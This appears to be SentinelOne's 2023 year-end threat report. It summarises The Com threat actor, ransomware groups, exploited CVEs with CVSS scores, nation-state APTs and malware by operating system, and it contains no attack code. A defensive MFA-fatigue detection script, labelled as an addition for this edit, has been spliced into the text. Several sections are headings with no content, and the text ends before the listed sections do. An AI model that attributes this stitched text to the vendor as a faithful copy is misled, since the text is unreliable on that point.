##### Intelligence-Driven Threat Hunting

### END OF YEAR 2023

-----

#### Table of Contents

- Letter from the Editor **3**
- Executive Summary **4**
- 2023 WatchTower Recap **4**
- Most Impactful Threat Actor of 2023 - The Com **5**
- Top Ransomware Groups of 2023 **7**
- 2023 Monthly Ransomware Activity **8**
- Top Vulnerabilities Exploited in 2023 by Human Operated Ransomware Groups **9**
- A Kill Chain Review of the Top 5 Ransomware Groups **10**
- Top News from the Ransomware Landscape in 2023 **12**
- Top 10 Countries Targeted by Cyber Attacks in 2023 **16**
- Top 5 Industries Targeted by Cyber Attacks in 2023 **17**
- Rise in State-Sponsored Attacks **18**
- Most Active Nation-State APTs of 2023 **18**
- Top Threats of 2023 by Operating System **19**
- Top 5 Vulnerabilities Exploited in 2023 **22**
- Top MITRE Techniques **24**
- Top Off-the-Shelf Tools Abused in 2023 **25**
- Top Malicious File Types (Excluding PE files) **26**
- Most Abused File Sharing Platforms **26**
- Most Abused LOLbins **27**
- Most Used Cross-Platform Programming Languages for Malware **28**
- DLL Side-Loading Attacks Remain a Favorite in 2023 **29**
- Top Vulnerable Drivers Targeted by Attackers **30**
- EDR Bypass Tools and Techniques in 2023 **30**
- 2023 Infostealer Ecosystem Overview **31**
- Top Stories from 2023 **33**
- About WatchTower **51**

###### Before You Get Started...

The WatchTower monthly digest is a summary of our findings from hunts performed over the previous month. Impacted customers will be notified separately by the Vigilance team with courses of action for triage, investigation, and remediation.

This report contains sensitive information with the TLP:AMBER classification. This includes specific IOCs, TTPs, case studies and campaign analysis drawn from SentinelOne. This information should be kept confidential and protected from potential threat actor access. As such, this version is provided only to SentinelOne Vigilance and WatchTower customers. [Please click here to explore WatchTower services.](https://www.sentinelone.com/global-services/watchtower/)

-----

#### Letter from the Editor

2023 was a tumultuous year in cyber crime. We saw globally impactful attacks, followed by law enforcement takedowns, and reincarnations of once-defeated threat actor groups. We saw clever new pivots in malware capabilities, threat actor TTPs, and massively widespread zero-day exploits; and through it all, WatchTower was there.

WatchTower, SentinelOne’s Threat Hunting and Intelligence arm, is composed of globally distributed security researchers and intelligence analysts working continually to understand the ever evolving cyber threat landscape. We take advantage of threats identified on our globally deployed endpoints, as well as open source / darkweb threat research, and we work closely with our Vigilance MDR and DFIR teams to understand threat actor modus operandi in detail. All of this allows us to both respond extremely rapidly to new threats and be predictive in our threat hunting. At the end of the day, our mission is to protect our clients with industry-leading threat hunting, threat intelligence, and risk identification and mitigation.

2023 was a remarkable year for WatchTower. In October we officially relaunched our service with an amazing new set of capabilities that include:

- 24/7 Real-time threat hunting, investigation, and containment
- Integration of machine learning and AI into our threat hunting algorithms
- Massively expanded intelligence sources for additional Atomic IOC and Behavioral IOC hunting
- Expanded telemetry by automating host-based YARA and forensic artifact collection for hunt finding verifications
- Greatly expanded Linux, OSX, and Cloud behavioral hunting libraries

Further, WatchTower Pro, our combined compromise/risk/security assessment and threat hunting service, expanded engagements by 3X with 100% customer retention.
With WatchTower Pro, we help our clients identify risks from both within their environment and vulnerable paths into their network that threat actors can target. Together, this growth truly made 2023 the year of WatchTower, and we’re so grateful to have you on this journey with us.

Throughout our work over this past year, we’ve collected a wide array of metrics and stories that we are thrilled to share with you. I would like to thank our contributors to this year-end report, to include:

Lead Author: Niranjan Jayanand

Contributors: Tanmay Barhale, Rohit Chaturvedi, Dinesh Devadoss, Rahul R, Nithya Menon, Matt Weikert

We wish you a very Happy 2024, and as always, Happy Hunting.

**Brian Hussey**
VP Threat Hunting, Intelligence & DFIR

-----

#### Executive Summary

In this special year-end edition of the WatchTower Digest, we discuss the threats we observed and investigated in 2023, and look ahead to the 2024 threat landscape. Our findings are based on SentinelOne's Singularity telemetry across tens of millions of endpoints, operating across a diverse number of industries and global geographies.
This edition of WatchTower includes:

- A comprehensive review of the top cyber attacks in 2023
- A look at the top threats across Windows, Mac, and Linux environments
- Original insights into major vulnerabilities, cyber crime toolkits, and human-operated ransomware groups
- Ransomware group disruptions and reincarnations in 2023
- An overview of the most prevalent commodity crime toolkits, shared loader and APT groups in 2023
- Coverage of the first double supply chain attack
- Coverage of a rise in state-sponsored attacks
- Coverage of a rise in multiple vulnerabilities abused in the second half of 2023 for targeted attacks
- Predictions on the top cybersecurity threats of 2024

#### 2023 WatchTower Recap

- **1,400+** Total Hunting Queries Shared, Created, and Enriched
- **270+** Total Flash Reports Published
- **1,500+** Total Pages of Threat Intelligence Shared
- **10+ Million** Atomic & Behavioral IOCs Hunted
- **50+** Vulnerability Exploitation Campaigns Tracked
- **200+** Participations in Active Investigations
- **10's of Millions** of Atomic IOCs Processed
- **20+** First Finder Reports and 2 Mac Threat Blogs
- **300+** Total Malware Families Tracked and **60+** Total Ransomware Groups Tracked

-----

Figure: The Com - A Visualization

#### Most Impactful Threat Actor of 2023 - The Com

Beginning in 2022 and throughout 2023, SentinelOne's Vigilance DFIR team observed multiple threat actors that stem from the same online community, which gave itself the name "The Com". Vigilance DFIR investigators collaborated closely with Allison Nixon, from UNIT 221B, to research the inner workings of this fascinating group of threat actors.

The Com, a clandestine online community, has recently come under scrutiny for its increasingly brazen activities. Composed of a diverse membership, including gamers, hackers, and recreational users, the group operates within Telegram chat servers, creating a wide-ranging ecosystem that spans hundreds of individuals.
The Com's genesis is not confined to a specific genre or interest; instead, it serves as a loose umbrella for various subgroups and activities, ranging from gaming and meme-sharing to more sinister activities such as cybercrime and physical violence. The vague nature of The Com challenges conventional definitions, blurring the lines between a community, a criminal organization, and a subculture that recruits unsuspecting individuals into its ranks.

Despite the seemingly innocuous nature of many interactions within the group, many have graduated from low-level crime, including SIM swapping, doxing, and social media account take-overs, to conducting some of the most high-profile network intrusion and ransomware cases in 2023. Many of these cybercrime incidents are also followed with threats of – or in some cases acts of – real-life violence, which are often carried out by other subgroups within The Com.

The Com has been the birthplace of many cyber threat actors we hear of today, most notably: LAPSUS$, Star Fraud (Octo Tempest, UNC3944, Muddled Libra, Scattered Spider), and many others.

Subgroups shown in the visualization: FBH, ACG, ChucklingSquad, PearsonSquad, SquadBrick, RR, Kaskar, GangSplur, FraudStar, 764, LAPSUS$, CVLT, ViLE/Doxbin, and many more.

The Com is deeply involved in cybercrime, with a historical focus on tactics such as gaining access to BPOs (Business Processing Organizations) to perform SIM swaps. SIM swapping is the process of activating a mobile phone number to a new line of service on a new physical device. Performing SIM swaps allows threat actors within The Com to gain unauthorized access to individuals' cryptocurrency accounts or bypass MFA solutions for corporate network access. More recently, The Com has adapted its approach in its pursuit of financial crimes by evolving its SIM swapping tactics to socially engineering workers into deploying malware and ransomware within victim networks.
-----

…broader online security landscape. Beyond financial motivations, The Com's cyber activities contribute to the group's broader criminal endeavors, linking them to a nationwide epidemic of swatting calls targeting schools and universities. The FBI's recognition of The Com as a group of interconnected cybercriminal actors underscores the gravity of their cyber activities, prompting investigations into the extent of their involvement and the potential risks they pose to online and real-world communities.

There was a major shift from the SIM swapping and BPO compromise tactics seen in 2022, when a notable group within The Com, known as Star Fraud, became an affiliate for the ALPHV/BlackCat ransomware group. This shift happened early in 2023, and quickly plagued organizations across multiple verticals.

Figure: Star Fraud kill chain
- Compromise: Phishing Emails; Credential Theft/Purchase; MFA Bombing/Fatigue; VPN Usage
- Persistence: Remote Access Tools; Download Tools from Transfer States; Ransomware Deployment
- Action on Objectives: SIM Swapping → Crypto Theft; Data Exfiltration

Tracking this group by tools and TTPs alone can be difficult. After gaining access to networks, SentinelOne observed The Com threat actors using free and open-source tooling that is readily available to the general public. Most of these come in the form of remote access and tunneling tools that may or may not be used legitimately by users within victim environments. Below is a sampling of legitimate tools used by Star Fraud.
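The kill chain above lists MFA Bombing/Fatigue as a compromise step: the actor already holds a valid password and pushes MFA prompts until the victim approves one. Because the eventual approval looks like a normal login, the signal lives in the run of rejected or unanswered prompts that precedes it. The following Python is an added detection example written for this edit (not code from the report or from SentinelOne) that scans a constructed authentication log for exactly that pattern; the log format, field names, 10-minute window and threshold of 4 rejections are all assumptions.

```python
"""Added example: flag an MFA approval that follows a burst of rejected pushes.

The log format below is an assumption for this example:
  "<ISO-8601 UTC timestamp> user=<account> result=<denied|timeout|approved> src=<ip>"
Lines are expected in chronological order, as an identity provider export would be.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not real telemetry). Addresses are documentation ranges.
# jdoe:   five rejected pushes in three minutes, then an approval  -> should alert
# asmith: one rejection then an approval                           -> normal user fumble
# bking:  four rejections, but the approval comes 80 minutes later -> outside the window
SAMPLE_LOG = """\
2023-05-02T01:12:03Z user=jdoe result=denied src=203.0.113.9
2023-05-02T01:12:40Z user=jdoe result=denied src=203.0.113.9
2023-05-02T01:13:15Z user=jdoe result=timeout src=203.0.113.9
2023-05-02T01:13:52Z user=jdoe result=denied src=203.0.113.9
2023-05-02T01:14:30Z user=jdoe result=denied src=203.0.113.9
2023-05-02T01:15:10Z user=jdoe result=approved src=203.0.113.9
2023-05-02T09:00:00Z user=asmith result=denied src=198.51.100.4
2023-05-02T09:00:30Z user=asmith result=approved src=198.51.100.4
2023-05-02T14:05:00Z user=bking result=denied src=192.0.2.77
2023-05-02T14:06:00Z user=bking result=denied src=192.0.2.77
2023-05-02T14:07:00Z user=bking result=denied src=192.0.2.77
2023-05-02T14:08:00Z user=bking result=denied src=192.0.2.77
2023-05-02T15:30:00Z user=bking result=approved src=192.0.2.77
"""

REJECTED = {"denied", "timeout"}


def parse_line(line):
    """Split one log line into (timestamp, {field: value})."""
    ts_text, *pairs = line.split()
    ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")
    fields = dict(pair.split("=", 1) for pair in pairs)
    return ts, fields


def detect_mfa_fatigue(log_text, window=timedelta(minutes=10), min_rejections=4):
    """Return one alert per approval preceded, within `window`, by at least
    `min_rejections` rejected or unanswered pushes for the same account."""
    recent = defaultdict(deque)  # account -> timestamps of recent rejected prompts
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, f = parse_line(line)
        user, result = f["user"], f["result"]
        queue = recent[user]
        # Expire rejections that are older than the window relative to this event.
        while queue and ts - queue[0] > window:
            queue.popleft()
        if result in REJECTED:
            queue.append(ts)
        elif result == "approved":
            if len(queue) >= min_rejections:
                alerts.append({
                    "user": user,
                    "approved_at": ts,
                    "rejections": len(queue),
                    "src": f.get("src"),
                })
            queue.clear()  # an approval ends the burst either way
    return alerts


def main():
    for a in detect_mfa_fatigue(SAMPLE_LOG):
        print(f"{a['user']}: approval at {a['approved_at']:%H:%M:%S}Z "
              f"after {a['rejections']} rejected pushes (src {a['src']})")


if __name__ == "__main__":
    main()
```

Running the script reports only jdoe. The deque per account keeps the scan linear in the number of log lines, and clearing it on every approval means a legitimate user who taps "deny" once and then approves is never counted against a later burst. In production the threshold and window would be tuned against the identity provider's own prompt cadence, and the source IP of the approval would be compared with the user's usual locations before an analyst is paged.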
-----

#### Top Ransomware Groups of 2023

WatchTower tracked hundreds of ransomware groups active throughout 2023. The graphic below shows both the prevalence (frequency of global attacks) and Profit Score (average ransom size). It should, however, be noted that Lockbit is represented out of scale. In actuality, Lockbit was 3.5X more active than its closest competitor. It is also interesting to note that MalasLocker's profit score was evaluated the same as all of the other threat actors, even though technically they demand payment be sent to charities rather than to line their own pocketbooks. While this Robin Hood approach may initially sound philanthropic, in reality it is just another ransomware threat actor illegally demanding payment from innocent victims.

-----

#### 2023 Monthly Ransomware Activity

The chart below shows the aggregated monthly activity of all ransomware groups tracked by WatchTower. While January and February started slow, things quickly picked up, with May being the most active month for Ransomware Threat Actors in 2023.

Chart: 2023 Ransomware Monthly Targeted Attacks (All Threat Actors); monthly counts from Jan to Dec on a 0-600 scale, with Peak, Average and Low markers.

Tracking the top 10 ransomware groups' monthly activity paints an interesting picture. Clearly Lockbit continually rules the ransomware threat landscape. However, some families like MalasLocker made the top 10 via an extremely busy May, with only minor activity tracked throughout the remaining months of the year. Akira and 8Base conducted negligible activity early in the year but got seriously busy once spring arrived.
-----

#### Top Vulnerabilities Exploited in 2023 by Human Operated Ransomware Groups

WatchTower hunters worked closely with SentinelOne's DFIR, MDR, and R&D teams in 2023 to track and investigate vulnerabilities that threat actors exploited to gain initial access in 2023. WatchTower Threat Hunting customers can access detailed reports on each of these vulnerabilities and their kill chains. [WatchTower would like to thank @BushidoToken for their original research posted here.](https://twitter.com/BushidoToken/status/1738223234389291079) We incorporated this research to help drive our hunting operations throughout 2023.

###### Ransomware Zero Days in 2023

Figure: ransomware groups (Cl0p, Magniber, Nokoyawa, Storm-0978/RomCom, LockBit, Akira, NoEscape, Medusa, Hunters International, ALPHV/BlackCat, BlackSuit, PLAY) mapped to the products they exploited (GoAnywhere, PaperCut, MOVEit, SysAid, Windows SmartScreen, Windows CLFS, MS Office, Cisco ASA, Citrix NetScaler "Citrixbleed", Microsoft Exchange).

- Cl0p Abused FTA Vulnerabilities
- Multiple Vulnerabilities in NetScaler Gateway and ADC (CVE-2023-3519, CVE-2023-3466, CVE-2023-3467, and CVE-2023-4966)
- Akira Targets Cisco ASA Vulnerability (CVE-2023-20269)
- Akira Continues to Abuse Cisco VPN Vulnerability to Achieve Initial Access
- Akira Ransomware Exploits Cisco VPN Vulnerability and TTP Update
- Microsoft Exchange Server Vulnerabilities Exploited To Drop Play Ransomware
- Buhti Ransomware Exploits PaperCut Vulnerability
- RomCom Actors Abuse CVE-2023-36884
- SysAid Vulnerability (CVE-2023-47246) Abused in Targeted Attack
- Confluence Vulnerability (CVE-2023-22518) Leads to Ransomware Infection
- Cl0p Ransomware Vulnerability Exploitation Update
- Magniber Ransomware Exploits SmartScreen Vulnerability
- Human-Operated Ransomware Groups Exploit Recent Apache ActiveMQ Vulnerability
-----

#### A Kill Chain Review of the Top 5 Ransomware Groups

-----

#### Top News from the Ransomware Landscape in 2023

###### Forty countries joined a United States-led alliance signing a pledge to not pay cybercriminal ransoms in an effort to eliminate hackers' funding mechanisms.

The average ransomware payout cost has surged to $1.6 million compared to the previous year's average of over $272,000. 43% of surveyed companies confirmed paying the ransom.

###### ALPHV went beyond extortion and filed a SEC (U.S. Securities and Exchange Commission) complaint.

The SEC requires [public companies to disclose cybersecurity breaches within four days](https://www.sec.gov/files/rules/final/2023/33-11216.pdf). ALPHV is the first group to file SEC complaints after a successful intrusion because of victim non-payment.

-----

###### An internationally coordinated initiative was launched by Europol and Eurojust aimed at disrupting the RagnarLocker ransomware group.

The U.S. Department of Justice led an international coalition to Disrupt the Hive Ransomware Variant.

-----

###### Europol and Eurojust led international collaboration to disrupt a prolific ransomware group in Ukraine known to be heavy users of LockerGoga, MegaCortex, Hive and Dharma ransomware.

U.S. Law enforcement successfully dismantled the Genesis Market. The operation, codenamed MEDUSA, yielded 119 arrests, 208 property searches and 97 knock and talks.

Captured malware was linked to a unit within Center 16 of Russia's FSB. The FBI-created tool named PERSEUS caused the Snake malware to overwrite its own vital components.
-----

###### An FBI-led coalition seized the ALPHV/BlackCat Ransomware blog page in December.

Four days later, the threat actors launched an alternative site, which is still operational at the time of this publication.

-----

#### Top 10 Countries Targeted by Cyber Attacks in 2023

Cybercrime is a global problem. No single country in the world is immune from being attacked. Here are the top 10 countries targeted by Cyber Attacks in 2023.

Map: top 10 targeted countries (USA, UK, Canada, Italy, Germany, France, Australia, India, Brazil, Spain).

54% of all Global Cyber Attacks targeted the United States. This was 10x more than the UK, the second closest competitor.

The chart below shows the monthly breakdown of attacks experienced by the top 10 targeted countries of 2023.

-----

#### Top 5 Industries Targeted by Cyber Attacks in 2023

The most targeted industries in 2023 are shown below. Some key factors in an attacker's choice to target specific industries include:

1. The importance of their data and reputation.
2. The potential willingness to pay a ransom.
3. The overall state of the target’s security posture.

Top Targeted Industries:

1. **Manufacturing - 20.5%**
2. **IT/Engineering/Tech - 14.4%**
3. **Finance - 12.0%**
4. **Healthcare - 9.4%**
5. **Education - 8.0%**
6. **Others - 35.7%**

-----

#### Rise in State-Sponsored Attacks

China, Russia, North Korea, and Iran have developed some of the most sophisticated and comprehensive cyber tradecraft that governments and businesses have to battle today. Nation-states, driven by political agendas, have harnessed cyber espionage as a powerful tool to gather intelligence, influence events, and undermine rivals.
Over the years, there have been many reported cases of government agencies, energy grids, financial institutions, and healthcare systems falling prey to targeted attacks, jeopardizing both economic stability and public safety.

Cyber espionage's impact on the global economy has redefined the dynamics of trade, innovation, and security. Businesses lose billions annually when intellectual property is compromised, and the increasing number of supply chain attacks disrupts manufacturing and distribution networks to an alarming degree. Nation-states exploit digital vulnerabilities to influence elections, gather classified intelligence, and disrupt rival activities. This has blurred the traditional boundary between physical and virtual warfare and reshaped power dynamics in the cyber arena, allowing smaller nations to wield disproportionate influence far beyond their physical borders.

Supply Chain Compromises – Attacks against SolarWinds, 3CX, and Kaseya affected thousands of organizations, including U.S. government agencies, demonstrating the vulnerability of global supply chains.

#### Most Active Nation-State APTs of 2023

1. **Red Delta (China)** - Red Delta is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. This group has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.
2. **Lazarus (North Korea)** - Lazarus Group is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau. This group is believed to be responsible for the 3CX supply chain attack.
3. **OilRig (Iran)** - OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications.
4. **Sandman (China)** - Sandman APT is likely associated with suspected China-based threat clusters known to use the KEYPLUG backdoor, in particular a cluster jointly presented by PwC and Microsoft at Labscon 2023 – STORM-0866/Red Dev 40.
5. **Arid Viper (Palestine)** - Arid Viper is an espionage-motivated cyber threat actor with Hamas-aligned interests. Arid Viper's toolkit is multi-platform and includes the consistent use and development of mobile spyware since emerging in 2017. Increased industry focus on Arid Viper is an extension of our continuing collective efforts to track threat actors engaged in the Israel-Hamas war.

-----

#### Top Threats of 2023 by Operating System

###### Windows

There was no reduction in Windows malware and loaders in 2023. Many commodity loaders were polymorphic (changing their hash on every execution) and supported attackers' hands-on-keyboard activities for information gathering, disabling security settings, and forging the way for ransomware attacks.

1. **Pikabot** - A loader malware that demonstrates advanced techniques with evasion, injection, and anti-analysis, and supports various options for C2 communication and second stage injection. The Pikabot loader displayed increased activity when Qakbot operations were taken down. Pikabot showed continually increasing activity throughout the year and is still on the rise.
2. **SocGholish** - SocGholish is a downloader that uses JavaScript to download files via HTTP and writes the payloads to disk before launching them.
3. **GootLoader** - A first stage malware that is based on JavaScript and commonly uses SEO poisoning and compromised websites to trick victims into downloading a ZIP archive.
4. **SolarMarker** - A malware family that is known for stealing information and creating backdoors, and is typically spread through search engine optimization (SEO).
5. **Raspberry Robin** - The Raspberry Robin worm, also known as the QNAP worm or LNK worm, is a worm that installs from infected removable drives.

The chart below shows the comparative prevalence rates of the top 5 malware families seen targeting Windows in 2023. Pikabot was the clear leader. Raspberry Robin, while only representing 3% of attacks seen from the top five families, was the fastest growing variant in the latter half of 2023, and should be closely watched as we enter 2024.

Chart: prevalence of the top 5 Windows malware families in 2023 - Pikabot 65%, SocGholish 16%, GootLoader 8%, SolarMarker 8%, Raspberry Robin 3%.

-----

###### Linux

We observed multiple botnets (Mirai, Mirai-related variants, and BASHLITE), multiple crypto-jacking campaigns (Kinsing, XMRig), and the use of rootkits in multiple campaigns, such as the [Krasue campaign](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068Tc000001MMZDIA4), which uses a rootkit to hide itself. We also witnessed a significant increase in LinPEAS usage and in the use of webshells in campaigns like [Teal Kurma](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068Tc000001M8O9IAK), where a webshell named SnappyTCP was deployed. There has also been an increase in ransomware attacks targeting Linux environments. Here is a list of the top malware families targeting Linux environments:

1. **Mirai** - In 2023, Mirai continues to be one of the most seen botnets. Mirai is known to exploit IoT devices and launch large-scale distributed denial-of-service (DDoS) attacks.
2. **BASHLITE** - BASHLITE (also known as Lizkebab and Gafgyt) is a botnet which spreads by using vulnerabilities in devices with weak security.
3. **XMRig** - XMRig is open source software for mining the Monero cryptocurrency. It has been continuously used in crypto-jacking campaigns for unauthorized mining activities.
4. **Kinsing** - Kinsing (h2miner) is known to target Kubernetes, and has been found exploiting CVE-2023-4911 (Looney Tunables).
5. **Ares** - Ares is an open source Remote Access Tool which has also been used in SideCopy campaigns delivering Ares to Linux endpoints.

Chart: prevalence of the top 5 Linux malware families in 2023 - Mirai 68.7%, XMRig 15.7%, BASHLITE 14.7%, Kinsing 0.5%, Ares 0.4%.

-----

###### Mac

Threat actors have begun using more sophisticated social engineering techniques to compromise Mac users. Earlier in 2023, WatchTower observed [RustBucket malware](https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/) targeting organizations with specially crafted applications that victims were persuaded into executing as part of an elaborate social engineering scheme. Threat actors engaged victims with the promise of a business deal and shared ‘confidential' PDF documents that could not be read by ordinary PDF viewer software. The names of such software applications were used to disguise malicious or unwanted programs among the top Mac threats in 2023.

1. **AdLoad** - AdLoad is one of several widespread adware and bundleware loaders currently afflicting macOS.
2. **Bundlore** - Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.
3. **AtomicStealer** - This infostealer can grab account passwords, browser data, session cookies, and crypto wallets.
4. **Pirrit** - Pirrit is a piece of adware and browser hijacker with the aim of making money through search redirections.
5. **Proxy Agents** - Bundlore delivers these agents, which act as a proxy for attackers to carry out their malicious activity.

Chart: prevalence of the top 5 Mac threats in 2023 - AdLoad 93.2%, Bundlore 4.8%, AtomicStealer 0.9%, Pirrit 0.7%, Proxy Agent 0.3%.

-----

#### Top 5 Vulnerabilities Exploited in 2023

In 2023, we continued to see some attackers use old vulnerabilities to gain access to exposed environments. We also saw multiple new CVEs abused by attackers that caused a major global impact.
Below are the top CVEs abused in 2023, followed by a collection of other highly impactful vulnerabilities exploited during the year.

1. [Microsoft Exchange Server ProxyShell (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)](https://nvd.nist.gov/vuln/detail/CVE-2021-34473)
2. [Progress MOVEit Transfer SQL Injection Vulnerability (CVE-2023-34362)](https://nvd.nist.gov/vuln/detail/CVE-2023-34362)
3. [PaperCut MF/NG Improper Access Control Vulnerability (CVE-2023-27350, CVE-2023-27351)](https://nvd.nist.gov/vuln/detail/CVE-2023-27350)
4. [Log4Shell (CVE-2021-44228)](https://nvd.nist.gov/vuln/detail/cve-2021-44228)
5. [Remote code execution vulnerability in the Equation Editor component of Microsoft Office (CVE-2017-11882)](https://nvd.nist.gov/vuln/detail/cve-2017-11882)
6. [Atlassian Confluence Data Center and Server Broken Access Control Vulnerability (CVE-2023-22515)](https://nvd.nist.gov/vuln/detail/CVE-2023-22515)
7. [Atlassian Confluence Data Center and Server Improper Authorization Vulnerability (CVE-2023-22518)](https://nvd.nist.gov/vuln/detail/CVE-2023-22518)

###### Other top CVEs seen exploited in 2023 are listed below:

- [VMware Workspace ONE Access & Identity Manager (CVE-2022-22954, CVE-2022-22960)](https://nvd.nist.gov/vuln/detail/CVE-2022-22954)
- [Remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office (CVE-2017-0199)](https://nvd.nist.gov/vuln/detail/cve-2017-0199)
- [Follina vulnerability (CVE-2022-30190)](https://nvd.nist.gov/vuln/detail/CVE-2022-30190)
- [Fortinet FortiOS & FortiProxy (CVE-2018-13379)](https://www.fortiguard.com/psirt/FG-IR-18-384)
- [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](https://nvd.nist.gov/vuln/detail/CVE-2021-40539)
- [Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)](https://nvd.nist.gov/vuln/detail/CVE-2021-26084)
- [F5 Networks BIG-IP (CVE-2022-1388)](https://nvd.nist.gov/vuln/detail/CVE-2022-1388)
- [Microsoft Windows Search Remote Code Execution Vulnerability (CVE-2023-36884)](https://nvd.nist.gov/vuln/detail/CVE-2023-36884)
- [Barracuda Networks ESG Appliance Improper Input Validation Vulnerability (CVE-2023-2868)](https://nvd.nist.gov/vuln/detail/CVE-2023-2868)
- [RARLAB WinRAR Code Execution Vulnerability (CVE-2023-38831)](https://nvd.nist.gov/vuln/detail/CVE-2023-38831)
- [Cisco Adaptive Security Appliance and Firepower Threat Defense Unauthorized Access Vulnerability (CVE-2023-20269)](https://nvd.nist.gov/vuln/detail/CVE-2023-20269)
- [.NET deserialization vulnerability in WS_FTP Server versions prior to 8.7.4 and 8.8.2 (CVE-2023-40044)](https://nvd.nist.gov/vuln/detail/CVE-2023-40044)
- [Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability (CVE-2023-4966)](https://nvd.nist.gov/vuln/detail/CVE-2023-4966)
- [Path traversal vulnerability in SysAid On-Premise before 23.3.36 (CVE-2023-47246)](https://nvd.nist.gov/vuln/detail/CVE-2023-47246)
- [Citrix NetScaler ADC and NetScaler Gateway Code Injection Vulnerability (CVE-2023-3519)](https://nvd.nist.gov/vuln/detail/CVE-2023-3519)
- [JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2023-42793)](https://nvd.nist.gov/vuln/detail/CVE-2023-42793)
- [Apache Struts vulnerability (CVE-2023-50164)](https://nvd.nist.gov/vuln/detail/CVE-2023-50164)
- [VMware vCenter Server Out-of-Bounds Write Vulnerability (CVE-2023-34048)](https://nvd.nist.gov/vuln/detail/CVE-2023-34048)
- [Remote code execution vulnerability in Apache ActiveMQ (CVE-2023-46604)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604)

###### Heat Map Legend

|Severity|Score Range|
|---|---|
|Low|0.1-3.9|
|Medium|4.0-6.9|
|High|7.0-8.9|
|Critical|9.0-10.0|

The heat map below gives the CVSS v3.x base score and its two subscores for each vulnerability; the Severity column applies the legend above. For reference, a vulnerability with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H scores 9.8, with an Impact subscore of 5.9 and an Exploitability subscore of 3.9.

|CVE|Base Score|Impact Subscore|Exploitability Subscore|Severity|
|---|---|---|---|---|
|CVE-2021-34473|9.8|5.9|3.9|Critical|
|CVE-2021-31207|6.6|5.9|0.7|Medium|
|CVE-2021-34523|9.8|5.9|3.9|Critical|
|CVE-2023-34362|9.8|5.9|3.9|Critical|
|CVE-2023-27350|9.8|5.9|3.9|Critical|
|CVE-2023-27351|7.5|3.6|3.9|High|
|CVE-2021-44228|10.0|6.0|3.9|Critical|
|CVE-2017-11882|7.8|5.9|1.8|High|
|CVE-2022-22954|9.8|5.9|3.9|Critical|
|CVE-2022-22960|7.8|5.9|1.8|High|
|CVE-2017-0199|7.8|5.9|1.8|High|
|CVE-2022-30190|7.8|5.9|1.8|High|
|CVE-2018-13379|9.8|5.9|3.9|Critical|
|CVE-2021-40539|9.8|5.9|3.9|Critical|
|CVE-2021-26084|9.8|5.9|3.9|Critical|
|CVE-2022-26134|9.8|5.9|3.9|Critical|
|CVE-2022-1388|9.8|5.9|3.9|Critical|
|CVE-2023-36884|7.5|5.9|1.6|High|
|CVE-2023-2868|9.8|5.9|3.9|Critical|
|CVE-2023-38831|7.8|5.9|1.8|High|
|CVE-2023-20269|9.1|5.2|3.9|Critical|
|CVE-2023-40044|8.8|5.9|2.8|High|
|CVE-2023-4966|7.5|3.6|3.9|High|
|CVE-2023-47246|9.8|5.9|3.9|Critical|
|CVE-2023-3519|9.8|5.9|3.9|Critical|
|CVE-2023-42793|9.8|5.9|3.9|Critical|
|CVE-2023-50164|9.8|5.9|3.9|Critical|
|CVE-2023-34048|9.8|5.9|3.9|Critical|
|CVE-2023-46604|9.8|5.9|3.9|Critical|
|CVE-2023-22515|9.8|5.9|3.9|Critical|
|CVE-2023-22518|9.8|5.9|3.9|Critical|

The Base Score is a function of the Impact and Exploitability subscores, computed with the CVSS v3.1 equations below.
The Base Score is defined as:

```
If (Impact subscore <= 0)  0
else,
  Scope Unchanged  Roundup(Minimum[(Impact + Exploitability), 10])
  Scope Changed    Roundup(Minimum[1.08 × (Impact + Exploitability), 10])
```

The Impact subscore (ISC) is defined as:

```
Scope Unchanged  6.42 × ISCBase
Scope Changed    7.52 × (ISCBase − 0.029) − 3.25 × (ISCBase − 0.02)^15

Where, ISCBase = 1 − [(1 − ImpactConf) × (1 − ImpactInteg) × (1 − ImpactAvail)]
```

The Exploitability subscore is:

```
8.22 × AttackVector × AttackComplexity × PrivilegesRequired × UserInteraction
```

#### Top MITRE Techniques

The MITRE ATT&CK Framework maps out attacker kill chain stages, giving security professionals a common language and point of reference. WatchTower hunters and SentinelOne forensic analysts investigated thousands of attempted attacks. Here are the most commonly used MITRE techniques of 2023:

#### Top Off-the-Shelf Tools Abused in 2023

Attackers often rely on off-the-shelf tools as key parts of their kill chain, not only because they are easily available, but also because their usage appears legitimate and usually will not raise security alerts. During WatchTower investigations, we enrich the alerts generated when such tools are executed with surrounding context, to narrow down the most likely malicious instances and support our hunting operations.

###### Kill Chain Breakup: Insights from 2023 Investigations

#### Top Malicious File Types (Excluding PE files)

Like previous years, WatchTower hunters continue to witness attackers choosing non-PE files to conduct their attacks. They may do this for many reasons: it can make analysis difficult by obfuscating the code, help perform memory-based attacks, and help achieve persistence. Often this is a precursor to launching a more traditional PE-style malware attack. The top 10 non-PE file formats used maliciously in 2023 are listed below:

1. .PS1 (PowerShell script)
2. .DOC (Word Document)
3. .JS (JavaScript)
4. .BAT (Batch File)
5. .ISO (Optical Disk Image)
6. .MSI (Windows Installer)
7. .ZIP (ZIP archive)
8. .RAR (WinRAR compressed file)
9. .PDF (Adobe Portable Document Format)
10. .ONE (Microsoft OneNote)

#### Most Abused File Sharing Platforms

